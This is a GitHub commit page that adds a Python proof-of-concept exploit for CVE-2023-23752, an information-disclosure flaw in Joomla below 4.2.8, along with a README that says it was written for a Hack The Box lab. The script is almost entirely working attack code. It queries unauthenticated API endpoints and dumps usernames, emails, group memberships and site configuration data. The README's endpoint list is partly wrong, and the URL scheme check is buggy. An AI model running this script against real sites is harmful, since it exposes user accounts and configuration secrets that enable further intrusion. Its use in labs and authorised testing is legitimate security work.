0xvoodoo/PoCs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Pushing code

Browse Source 
:)
This commit is contained in:
0xVoodoo
2025-07-31 01:14:17 -06:00
committed by GitHub
parent 8158167cbe
commit 14c0141694
2 changed files with 103 additions and 2 deletions
Download Patch File Download Diff File Expand all files Collapse all files
CVE-2023-23752.py
+76
View File
@@ -0,0 +1,76 @@
import requests
import json
import argparse
class User:
def __init__(user, name, email, lastvisitDate, groupNames):
user.name = name
user.email = email
user.lastvisitDate = lastvisitDate
user.groupNames = groupNames
def __str__(user):
return f"Username: {user.name}\nEmail: {user.email}\nLast Visit: {user.lastvisitDate}\nGroups: {user.groupNames}"
def vulnCheck(tgt):
verUrl = tgt + "/administrator/manifests/files/joomla.xml"
verData = requests.get(verUrl)
if len(verData.text) == 0 or "404" in verData.text.lower() or "403" in verData.text.lower():
print("[-] Site does not appear to be vulnerable!")
raise SystemExit
def getUsers(tgt):
usrUrl = tgt + "/api/index.php/v1/users?public=true"
usrData = requests.get(usrUrl)
if "404" in usrData.text.lower() or "403" in usrData.text.lower():
print("[-] Error fetching user data, site may not be vulnerable")
raise SystemExit
parsedUsrs = json.loads(usrData.text)
return parsedUsrs
def parseUsers(usrData):
users = []
for user in usrData["data"]:
userAtribs = user["attributes"]
newUser = User(userAtribs["username"],
userAtribs["email"],
userAtribs["lastvisitDate"],
userAtribs["group_names"] )
users.append(newUser)
return users
def getConfig(tgt):
cfgUrl = tgt + "/api/index.php/v1/config/application?public=true"
cfgData = requests.get(cfgUrl)
if "404" in cfgData.text.lower() or "403" in cfgData.text.lower():
print("[-] Error fetching user data, site may not be vulnerable")
raise SystemExit
parsedCfg = json.loads(cfgData.text)
return parsedCfg
if __name__ == "__main__":
parser = argparse.ArgumentParser(prog='Joomla Info Disclosure CVE-2023-23752', description='This is a PoC for CVE-2023-23752, an information disclosure vulnerability in Joomla < 4.2.8', epilog='Written by 0xVoodo')
parser.add_argument('-t', '--target', required=True, help='Target IP/URL')
args = parser.parse_args()
tgt = args.target.lower()
if tgt[4] != "http" and tgt[5] != "https":
print("[*] No URL schema specified, defaulting to HTTP")
tgt = "http://" + tgt
vulnCheck(tgt)
print(f"\n[+] User data found!")
print("----------")
for user in parseUsers(getUsers(tgt)):
print(user)
print("----------")
print(f"\n[+] Config data found!")
print("----------")
for i in getConfig(tgt)["data"]:
print(i["attributes"])
README.md
+27 -2
View File
@@ -1,2 +1,27 @@
# CVE-2023-23752 # CVE-2023-23752 - Joomla Information Disclosure
CVE-2023-23752 - Joomla Information Disclosure Vulnerability
Yo, I needed to use this exploit in a HTB machine and the only other PoC I could find was written in ruby...
I didn't wanna mess with the ruby dependancies so I just re-wrote it in python "real quick".
---
This is basically just a parser for the JSON returned by the open API endpoints, this can be replicated easily with CURL or a web browser by hitting the following endpoints:
#### User Info
`/api/index.php/v1/config/applicaton?public=true`
#### Config Info
`/api/index.php/v1/config/application?public=true"`
## Usage
`python3 CVE-2023-23752.py -t <target_url>`
---
# License
GPL v3.0 - as all good software should be
Remember - don't be a skid :)